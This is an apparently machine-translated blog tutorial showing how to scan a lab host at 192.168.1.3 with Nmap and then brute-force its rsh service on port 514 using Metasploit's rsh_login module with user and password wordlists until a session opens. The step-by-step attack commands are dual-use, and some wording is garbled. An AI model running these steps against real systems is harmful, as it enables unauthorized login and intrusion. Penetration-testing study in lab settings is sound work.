First, using the Nmap tool to scan the target host
The 1.1 uses the Nmap command to scan the target host.
1.2 in the terminal to enter the command "NMAP–SV 192.168.1.3", the target host for port scanning, found open 514 ports, open tcpwrapped services.
650) this.width=650; "src=" Http://s2.51cto.com/wyfs02/M02/8B/CF/wKiom1hZJgiAKkD6AAD6uLMoiTs585.png "style=" float: none; "title=" 1.png "alt=" Wkiom1hzjgiakkd6aad6ulmoits585.png "/>
1.3 Enter the command "Msfconsole" in the terminal to launch the MSF terminal.
1.4 Enter the command "search Rsh_login" in the terminal to search for Rsh_login related tools and attack loads.
1.5 Enter the command "use Auxiliary/scanner/rservices/rsh_login" in the terminal to enable the exploit module, and the prompt will prompt you to enter the path.
650) this.width=650; "src=" Http://s2.51cto.com/wyfs02/M02/8B/CB/wKioL1hZJgmTyq6NAACjyzdYmg8701.png "style=" float: none; "title=" 2.png "alt=" Wkiol1hzjgmtyq6naacjyzdymg8701.png "/>
650) this.width=650; "src=" Http://s5.51cto.com/wyfs02/M02/8B/CB/wKioL1hZJgqxdBDfAAFLFSYuoAw755.png "style=" float: none; "title=" 3.png "alt=" Wkiol1hzjgqxdbdfaaflfsyuoaw755.png "/>
1.6 Enter the command "set RHOST 192.168.1.3" in the terminal to set the IP address of the target host.
1.7 Enter the command "set Rport 514" in the terminal to set the port number of the target host.
1.8 Enter "Set Pass_file/home/passwd.txt" in the terminal to set the password file used for the hack.
1.9 Enter "Set User_file/home/user.txt" in the terminal to set the login user name file used by the hack.
650) this.width=650; "src=" Http://s5.51cto.com/wyfs02/M00/8B/CF/wKiom1hZJguwXgkBAABOGviADuc879.png "style=" float: none; "title=" 4.png "alt=" Wkiom1hzjguwxgkbaabogviaduc879.png "/>
1.10 enters "exploit" in the terminal, starts to attack to the target host, the session establishes, indicates the overflow succeeds.
650) this.width=650; "src=" Http://s5.51cto.com/wyfs02/M00/8B/CF/wKiom1hZJg3CflLSAAIgIalZ2AU736.png "style=" float: none; "title=" 5.png "alt=" Wkiom1hzjg3cfllsaaigialz2au736.png "/>
1.11 Enter "Sessions" in the terminal to see the number of sessions.
650) this.width=650; "src=" Http://s5.51cto.com/wyfs02/M00/8B/CB/wKioL1hZJg6xIPdqAAApBjzjPkg711.png "style=" float: none; "title=" 6.png "alt=" Wkiol1hzjg6xipdqaaapbjzjpkg711.png "/>
This article is from the "12377962" blog, please be sure to keep this source http://12387962.blog.51cto.com/12377962/1884476
Metasploit Blasting tcpwrapped Service